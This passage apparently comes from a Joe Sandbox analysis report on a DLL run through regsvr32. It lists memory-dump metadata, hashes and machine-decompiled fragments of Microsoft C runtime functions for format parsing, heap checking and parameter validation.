                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                  • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                  • API String ID: 792801276-1329727594
                                                  • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                  • Instruction ID: 74944a5c68176a92a31906070f765b18f74d9586b7891cebb3d67554b9ce35f5
                                                  • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                  • Instruction Fuzzy Hash: B2613872A0D7C186E7B49B10E8907AEBBA0F784740FA18126D6CD47BA9DB3ED404CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __doserrno$_invalid_parameter
                                                  • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                  • API String ID: 747159061-3177431134
                                                  • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                  • Instruction ID: efe890aaf17933dee885bd0091a5358479214bdc632742ad2579ba78141b5705
                                                  • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                  • Instruction Fuzzy Hash: 25518C32A1864A86F7909B59E88076EB3E1F3807A5F609321E1ED077F5D7BED500CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                  • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                  • API String ID: 1608253119-1427866139
                                                  • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                  • Instruction ID: af7a509f9d9663d3d091774dda128b819ecaca6506a1d0d194354ddf51f74ba4
                                                  • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                  • Instruction Fuzzy Hash: 0F41573191DB4686E7A09B20F84436E72E0F786780F614135E6CD43AF8CBBEE485CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                  • API String ID: 2123368286-2958264153
                                                  • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                  • Instruction ID: 82e3240dde4e8d48ae566a9cb8a6505450234aa7e72eaba3f84792f0d3cada8d
                                                  • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                  • Instruction Fuzzy Hash: 3CE14D31A1DA868AEBB48B24E84076EB3E0F385765F204225E6DD43BE5DB7ED445CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg
                                                  • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 1967237116-569934968
                                                  • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                  • Instruction ID: 28cad1f176e9be3240a3a6eae7be917d28bff7715537f6893ff636485155e31a
                                                  • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                  • Instruction Fuzzy Hash: 4AD11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF9D3BFDE(char _a696, char _a976) {
                                                  
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}



                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: wctomb_s
                                                  • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2215178078-1895985292
                                                  • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                  • Instruction ID: 997c34190204a200d34649c4b27f82da9c53e16be2ae3c50a0a3632b50fb2b35
                                                  • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                  • Instruction Fuzzy Hash: E5B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F604126DAD887AA9DB7DD540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                  • API String ID: 2123368286-348877268
                                                  • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                  • Instruction ID: 912ac3d754b702bf63931d64d46681ea7dc30ff1a731304ef262a69894a36d33
                                                  • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                  • Instruction Fuzzy Hash: 60913A32A0DA4286E7A08B68E84476E77E0F394365F204625E7DD43AF8DB7EE5458F01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-4087627024
                                                  • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                  • Instruction ID: 0390e2d988dd4d1b4c77dc3c399ba89b4ed25e2388807167c80bf5b266a398b6
                                                  • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                  • Instruction Fuzzy Hash: 95713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED540CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                  • API String ID: 2123368286-3692278645
                                                  • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                  • Instruction ID: a0804de238eaeeb3fb2e5788e9c0a34a411087d46cc23648724fab17a52a0f2c
                                                  • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                  • Instruction Fuzzy Hash: 0E513C31A1C68686F7A0CB24E8447BE76E5F384344F604136E6CD47AB8DBBEE544CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _free_base_malloc_base
                                                  • String ID:
                                                  • API String ID: 3824334587-0
                                                  • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                  • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                                  • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                  • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                  • API String ID: 2123368286-817335350
                                                  • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                  • Instruction ID: bdf1888ae082cb337f1151e8154f2efa45ef3de29dcf6e6b26155e3a2b634fb1
                                                  • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                  • Instruction Fuzzy Hash: 6461FB36A18B4586EB64CB19E89132E77A0F785794F714126EBCD83BB4CB3ED451CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
                                                  				intOrPtr _v24;
                                                  				long long _v48;
                                                  				long long _v64;
                                                  				intOrPtr _t21;
                                                  
                                                  				_a8 = _t21;
                                                  				_v48 = 0;
                                                  				_v64 = 0;
                                                  				_v24 = _a8;
                                                  				_v24 = _v24 - 2;
                                                  				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
                                                  				goto __rax;
                                                  			}







                                                  0x7fef9d2cff0
                                                  0x7fef9d2cff8
                                                  0x7fef9d2d000
                                                  0x7fef9d2d010
                                                  0x7fef9d2d01b
                                                  0x7fef9d2d024
                                                  0x7fef9d2d048

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                  • API String ID: 2123368286-2245755083
                                                  • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                  • Instruction ID: 19b7c93d4736ed7bda32945b1fb5f0ab86c56f1dc684690d029957412a3b2f1f
                                                  • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                  • Instruction Fuzzy Hash: 8C71E83291C786CAE7A09F58E84476EB7E0F785754F214135E6CA47BA4CB3EE448CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: HeapPointerValid
                                                  • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                  • API String ID: 299318057-1988567080
                                                  • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                  • Instruction ID: 366f9875c4733d956d5456637ee1c03ed06e45eb4220731ed3e90847f50651e0
                                                  • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                  • Instruction Fuzzy Hash: FB314D36A1874A86EBE48B59E84172E67D1F785784F614036EACD83BB4DB3FD440CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer$_realloc_dbg
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                  • API String ID: 429494535-1858280179
                                                  • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                  • Instruction ID: 6b22acafcb165364cee05dc597c268ac6a46098997f00e2a063c2d8cfde95e66
                                                  • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                  • Instruction Fuzzy Hash: D441B836619B8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 1967237116-734865713
                                                  • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                  • Instruction ID: ca3ec57313c22d844cddba0ccc7478434e3ff2f5ac626f229199dffed11d05c2
                                                  • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                  • Instruction Fuzzy Hash: 83D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6DD87AA9DB7DE440CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {
                                                  
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}



                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 0-1585035072
                                                  • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                  • Instruction ID: 7092a431cc2f14586a5b6039053772aca43f1c1a92c9fb0ada713ca2b75f96be
                                                  • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                  • Instruction Fuzzy Hash: 93B10D7260CAC286E7B1DB55E8417AFB7E0F784356F104026EAC987AA9DB7DE444CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                  • API String ID: 2123368286-1876092940
                                                  • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                  • Instruction ID: 5b23c079d1b4d794af0cdd69ad2b30100ea5e3abf5a9ef6833dde17c78c07454
                                                  • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                  • Instruction Fuzzy Hash: 40911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CF01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                                  
                                                  				_a972 = _a696 & 0x000000ff;
                                                  				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                  				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                  				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                  				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                  				goto 0xf9d3bfd9;
                                                  				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                  				_a1096 = _a1096 + 1;
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3beb2;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xf");
                                                  				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
